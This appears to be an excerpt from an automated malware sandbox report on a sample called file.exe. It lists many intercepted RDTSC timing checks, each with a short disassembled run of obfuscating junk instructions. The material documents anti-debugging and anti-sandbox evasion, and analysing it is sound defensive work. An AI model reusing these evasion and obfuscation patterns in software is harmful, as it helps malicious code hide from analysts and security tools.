                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181B48 second address: 1181B64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DECD24176h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1181B64 second address: 1181B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ecx 0x00000007 je 00007F0DED622D82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187143 second address: 118715C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DECD24170h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118715C second address: 118716C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DED622D7Ah 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118716C second address: 1187190 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0DECD24166h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0DECD24176h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187729 second address: 118774B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F0DED622D76h 0x00000011 ja 00007F0DED622D76h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118774B second address: 118774F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118774F second address: 1187776 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DED622D83h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push ebx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F0DED622D76h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1187A1F second address: 1187A38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0DECD24171h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118858F second address: 118863C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F0DED622D7Eh 0x00000010 jmp 00007F0DED622D7Dh 0x00000015 pop ecx 0x00000016 popad 0x00000017 pushad 0x00000018 pushad 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b jmp 00007F0DED622D87h 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 pushad 0x00000026 js 00007F0DED622D76h 0x0000002c pushad 0x0000002d popad 0x0000002e jmp 00007F0DED622D89h 0x00000033 jmp 00007F0DED622D7Eh 0x00000038 popad 0x00000039 pushad 0x0000003a jmp 00007F0DED622D89h 0x0000003f jmp 00007F0DED622D7Fh 0x00000044 jng 00007F0DED622D76h 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118863C second address: 1188640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11888D1 second address: 11888E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0DED622D76h 0x0000000a jns 00007F0DED622D76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11888E3 second address: 11888E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1188B8B second address: 1188B9C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0DED622D7Ch 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1188E4B second address: 1188E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F0DECD24177h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1188E67 second address: 1188E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F0DED622D76h 0x00000009 je 00007F0DED622D76h 0x0000000f jmp 00007F0DED622D7Eh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0DED622D82h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1188E9E second address: 1188EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0DECD24176h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1188EBC second address: 1188EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11924BB second address: 11924C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11924C1 second address: 11924D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0DED622D81h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11924D7 second address: 11924E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11914CC second address: 11914FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D7Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jno 00007F0DED622D82h 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F0DED622D76h 0x00000019 push esi 0x0000001a pop esi 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11918E5 second address: 11918EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11918EB second address: 11918F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191ADE second address: 1191AE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191C79 second address: 1191C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191C7F second address: 1191C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0DECD24173h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191C99 second address: 1191CC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0DED622D7Eh 0x00000008 jmp 00007F0DED622D86h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1191FC6 second address: 1192005 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24170h 0x00000007 jmp 00007F0DECD24172h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F0DECD24175h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1192005 second address: 119202E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0DED622D76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0DED622D89h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119202E second address: 1192032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198101 second address: 119810A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198254 second address: 119826F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0DECD24166h 0x00000008 jmp 00007F0DECD24171h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119826F second address: 11982A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D7Bh 0x00000007 jmp 00007F0DED622D7Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jp 00007F0DED622D91h 0x00000014 jmp 00007F0DED622D7Dh 0x00000019 jns 00007F0DED622D7Eh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986B1 second address: 11986B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986B5 second address: 11986C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F0DED622D76h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986C8 second address: 11986CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11986CC second address: 11986D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119884D second address: 119885C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F0DECD24166h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119885C second address: 1198866 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0DED622D76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198866 second address: 119886C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 119886C second address: 1198883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DED622D83h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198883 second address: 1198887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198887 second address: 1198897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F0DED622D76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198897 second address: 119889B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198FCF second address: 1198FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1198FD4 second address: 1199015 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24178h 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jng 00007F0DECD24166h 0x00000015 jp 00007F0DECD24166h 0x0000001b pop ecx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F0DECD2416Dh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11996C6 second address: 11996E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11996E2 second address: 119970A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F0DECD24166h 0x0000000f jmp 00007F0DECD24173h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197CC9 second address: 1197CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1197CCE second address: 1197CD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A151B second address: 11A1535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0DED622D76h 0x0000000a jg 00007F0DED622D76h 0x00000010 jno 00007F0DED622D76h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A1535 second address: 11A153B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A10C1 second address: 11A10E0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0DED622D76h 0x00000008 jmp 00007F0DED622D85h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE0BD second address: 11AE0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B02A7 second address: 11B02CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F0DED622D76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0DED622D89h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B2A9C second address: 11B2AA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B5720 second address: 11B5745 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DED622D7Bh 0x00000009 pop ecx 0x0000000a push edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edi 0x0000000e push edx 0x0000000f jng 00007F0DED622D76h 0x00000015 pop edx 0x00000016 pushad 0x00000017 jg 00007F0DED622D76h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B5745 second address: 11B574B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B51C3 second address: 11B51C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B5311 second address: 11B5317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA05A second address: 11BA072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DED622D84h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BA072 second address: 11BA076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9B0F second address: 11C9B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F0DED622D87h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0DED622D7Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C9B3B second address: 11C9B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C84F6 second address: 11C84FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8918 second address: 11C891D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8C21 second address: 11C8C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F0DED622D76h 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8C39 second address: 11C8C3F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C8C3F second address: 11C8C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DED622D7Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C980B second address: 11C983A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007F0DECD24174h 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F0DECD24166h 0x00000015 jmp 00007F0DECD2416Ch 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C983A second address: 11C9855 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F0DED622D7Eh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11CE22D second address: 11CE243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DECD24172h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D941E second address: 11D9423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DAD73 second address: 11DAD7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDB90 second address: 11DDB94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDB94 second address: 11DDB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDB9D second address: 11DDBBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0DED622D76h 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f pushad 0x00000010 jmp 00007F0DED622D7Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBBC second address: 11DDBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0DECD24166h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBC8 second address: 11DDBD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DDBD1 second address: 11DDBE4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0DECD24166h 0x00000008 jc 00007F0DECD24166h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB827 second address: 11EB82D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB82D second address: 11EB833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB833 second address: 11EB83E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EB3C4 second address: 11EB3DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24175h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA202 second address: 11FA223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007F0DED622D86h 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA223 second address: 11FA228 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA228 second address: 11FA245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DED622D83h 0x00000009 pop edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA3A7 second address: 11FA3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jp 00007F0DECD24166h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA3B7 second address: 11FA3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FA3BC second address: 11FA3C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAABD second address: 11FAAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAAC1 second address: 11FAAC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAAC5 second address: 11FAAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F0DED622D7Ch 0x0000000c jno 00007F0DED622D76h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0DED622D80h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAAED second address: 11FAAF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FAAF1 second address: 11FAB0A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F0DED622D7Bh 0x00000013 rdtsc
